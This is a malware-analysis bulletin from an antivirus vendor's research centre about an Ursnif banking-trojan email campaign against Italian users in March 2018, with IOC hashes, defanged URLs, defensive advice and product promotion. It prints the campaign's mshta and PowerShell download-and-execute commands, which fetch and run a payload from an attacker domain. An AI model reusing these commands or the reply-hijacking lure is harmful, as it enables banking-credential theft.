14/03/2018
08:40

Malspam campaign distributing Ursnif malware continues on March 13, 14 2018

Italy again under attack by Trojan Banker Ursnif with maximum email sending on March 13, 14 2018
      
 
 
 

TG Soft's C.R.A.M. (Anti-Malware Research Center) examined  an email campaign spreading the Ursnif malware Trojan Banker sent on  March 13,14 2018.

Cyber-criminals developed "Social engineering" methods for fraudulent mass mailings, to induce the victim to open infected attachments or click on links in the body of the message.

If you received a suspicious email, send it to C.R.A.M. (Center for Anti-Malware Research): How to send suspicious emails

INDEX
 

"Ursnif" malware campaign.

Malware family: Ursnif
VirIT: Trojan.Win32.Ursnif.EO, Trojan.DOC.Dropper.OP, Trojan.DOC.Dropper.OM, Trojan.Win32.Ursnif.EP


Description:
The email campaign started on March 13, 2018 and is continuing with a new wave today, March 14.

Subject:[changes based on the email you receive]

Buongiorno,

 

Vedi allegato e di confermare.

(Good morning,

 
See attached and to confirm.)

How it spreads:
It exploits e-mail accounts configured in the infected pc, sending fake infected replies to messages ALREADY RECEIVED by the victim.
The body of the message is always the same (visible above in red), instead the subject is different because it answers to messages  received by the victim and therefore varies according to them.
The malicious attachment in the email is a DOC file containing an AutoClose MACRO that, as soon as it is started, downloads the malware and runs it.
 
The Autoclose macro first executes the MSHTA.EXE file by passing it, as a parameter, the url address for the download of a script for PowerShell (2018-03-13 campaign):

C:\Windows\System32\mshta.exe http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf

 Then a script is downloaded and executed by PowerShell:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile('http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class', $env:APPDATA + '\\dcd83bd5.exe'); Start-Process $env:APPDATA'\\dcd83bd5.exe'; (New-Object System.Net.WebClient).DownloadString('http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidf');

The PoweShell script downloads the Ursnif from the site http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class and puts it into automatic execution.
Concerning the DOC files analyzed, the malware is downloaded from the following sites:
  • http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf
  • http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class
  • http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidf

The malware, after being started, creates a key in HKCU\Software\Microsoft\Windows\CurrentVersion\Run with [random value]= %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[CARTELLA CASUALE]\NOMEFILE.EXE
The Ursnif malware makes an injection into the processEXPLORER.EXE

Examples:
Name: 53aeb123.exe
MD5: E79E933B5241CAA7763830C0CE4E241E
Size: 357.376 byte
Compilation date: 31/05/2024 02.17.41

As you can see, the compilation date has been falsified to the year 2024!

Name: d2203965.exe
MD5: 11EEC45893C23484DD31797690FE2203
Size 612.864 byte
Compilation date: 04/10/2004 15.59.46

In the March 14 campaign, the Word macro runs first cmd.exe and then powershell.exe to download the Ursnif Banker Trojan from: http://waidjqwudhsfganweweha[.]com.
 

Note:
The malware downloaded is part of the Ursnif family and its peculiarities are to steal access passwords to important sites such as may be home banking, mail, ftp etc.

IOC 2018-03-13:
 
File DOC MD5:
082067D08B4922CE359B08314572E17E
0A301BF3A183B07A29BF94E124569534
177425E33D7CB92E878B6CEEE7B69A4D
196124165249B60C4DBFC2BF541D53FC
1D4CFFA8503DCE2938367BE8586E0021
209F8193DCAA71C59625DFDDE52C38F3
2449CA769FBC20627012F1AAFF20DCDD
307E56E1B135E13EB0C3036978BCDAEB
3093611810F68DAE319095C4CBD83670
3BBA84853F5684BDFBB16D81E73A4D0F
3E287BF157D8355DBFEB7DCD81809CFC
43AA5981EDBF0604407A190AED3B17C7
4C10C21AE77940D1E5D6983268750F18
5917D6A7E7FBB19F6EC92D3488007095
62EF5FFDC1CFDD371E1A1BF4A63CB7C4
630F3AE1AC0054D0A8B9AB23AE75A904
6B30646D9B94A9449BAF9DDF3C325BEF
6C6274741355D7455D17D11E69501F14
765DA376D714E3BF7FDCE76CD03536A6
7945A4E9AACE1DF637C773F4B55AAD8B
7C4EFAA52802C59E73F87549117F8EF0
929AD25BCD81D3C33E84F61F1BB86FE0
A931B9E57A84D80405A0D417741476D7
AB41A1A8704D975ABA8CB8B72A98805A
BDA1E9E53FC818D8C1BCE320B71E77C5
BECF044A04E5DD1EFDFD2595B44D3304
C1BE41600B7E3FF0F16613866E52F8ED
C347A48A75F935E93AB9A7E445ECEB36
CC5FC59049C4BA39F7D84F3C68FDD52C
D09EA2FCD19D07BD07EFDEB1896E7E03
D394EF1BCE9ABF795E099145D89B22B2
DC9FCB24B7A929D95F9BB39FF00D41DE
EB9F29B3C6099A244D144F767178A129
FA9EB2B192E5A9FF0F7F999E9986FFBA
FEC143157AEBE91F6160E559B3859034

File EXE MD5:
11EEC45893C23484DD31797690FE2203
39F75FD74A440BEEFEA83B52F290AA3E
58BF0383AC83DFBCE1851FE02FFB4B55
92001083584DA4F9394371C9DB2570D6
E79E933B5241CAA7763830C0CE4E241E


URL:
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpid
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpida
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidb
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidc
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidd
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpide
http://dqwowqjudhqwdhasdadadw[.]com/REX/slick.php?utma=itpidf
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpid.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpida.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidb.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidc.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidd.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpide.class
http://dqwowqjudhqwdhasdadadw[.]com/NOE/itpidf.class
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpid
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpida
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidb
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidc
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidd
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpide
http://dqwowqjudhqwdhasdadadw[.]com/REX/freddie.php?l=itpidf



IOC 2018-03-14 (upgrade ore 12:56):
 
File DOC MD5:
10B415DA3B0931502C96A517F96A618D
143E45E1C63349C1E2F8A109F30FEB9A
1DC3EAD8A99918008CE416BFB9FB87A6
2CD58B6EF36D218FB89151D28668998E
38A4237CE90D40B3BDB0E51457F82D2E
4462587452684966029886A14E3409C9
5B75CE27B8A5D489223FF3BF8F07616D
704970D3342CE1F89B00CD5279FC863B
99570DD0B28429FD76842FB55204CB23
A3B4536464CEA7DB732885B6BA011C17
BB4F9A8AB9DB369FB4819D7AA9F42F9B
D9EE1AB90C2FC022194AFB4B96831920
F3CFC46592170CF1D8AD466134FD53D5


File EXE MD5:
A3D71E2E2249067CFF6ECBBEC5E7C7A1
AA583374D7A08D90772A3DAD3280886D
B857CC9CD3A3E10724BCC659FCC020C1
F5533A3F2DFA99D16E99F56C8C182C71
FCF53476C655730BF3486983BE218455


URL:
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker1.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker2.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker3.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker4.class
http://waidjqwudhsfganweweha[.]com/NOIT/testv.php?l=itmaker5.class
 
Back to top of page


 

How to identify a fake email

Experience and common sense are the first weapons to avoid these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of ZIP-formatted attachments and, if possible, DO NOT enable automatic macro execution. It is strongly discouraged to set up automatic execution of macros since simply opening Word and Excel files will see the immediate execution of macros without any prior alert.
In case you have been infected by a Banker, the advice from TG Soft's C.R.A.M. is to take appropriate security precautions even after the remediation of the system(s) involved such as changing the most commonly used passwords on the Web. In case the workstation involved is used for home-banking transactions, an assessment with your credit institution is also recommended  

How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts

Sending materials to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
  1. Any suspect email can be sent directly by the recipient's e-mail, to the following mail lite@virit.com,choosing as sending mode "Forward as Attachment" and inserting in the subject section "Possible phishing page to verify" rather than "Possible Malware to verify";
  2. Save  the e-mail to be sent to the  TG Soft's C.R.A.M. for analysis as an external file to the e-mail program used. The resulting file must be sent by uploading it from the page Send Suspicious Files(http://www.tgsoft.it/italy/file_sospetti.asp). Obviously if you want a feedback on the analysis of the data submitted, you have to indicate an e-mail address and a brief description of the reason for the submission (for example: possiible / probable phishing; possible / probable malware or other).
We give you these suggestions to help avoiding credential theft, viruses/malware or even worse next-generation Ransomware / Crypto-Malware
Back to top of page
 

Integrate your PC / SERVER protection with Vir.IT eXplorer Lite

If you are not yet using Vir.IT eXplorer PRO, it is advisable to install, Vir.IT eXplorer Lite -FREE Edition-.to supplement the antivirus in use to increase the security of your computers, PC and SERVER indifferently,

Vir.IT eXplorer Lite has the following special features:
  • freely usable in both private and corporate environments with Engine+Signature updates without time limitation;
  • Interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend to use it as a supplement to the AntiVirus already in use as it does not conflict or slow down the system but allows to significantly increase security in terms of identification and remediation of infected files;
  • It identifies and, in many cases, even removes most of the viruses/malware actually circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis  to update Vir.It eXplorer PRO;
  • Through Intrusion Detection technology, also made available in the Lite version of Vir.IT eXplorer, the software is able to report any new-generation viruses/malware that have set in automatically and send the reported files to TG Soft's C.R.A.M.
  • Proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.

For Vir.IT eXplorer PRO users...

For Vir.IT eXplorer PRO owners, it is also possible to contact for free TG Soft's technical phone support.The details can be found on the support page CLIENTS.
 


C.R.A.M. 
TG Soft's Anti-Malware Research Center
Back to top of page

 
Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”

Vir.IT eXplorer PRO is certified by the biggest international organisation: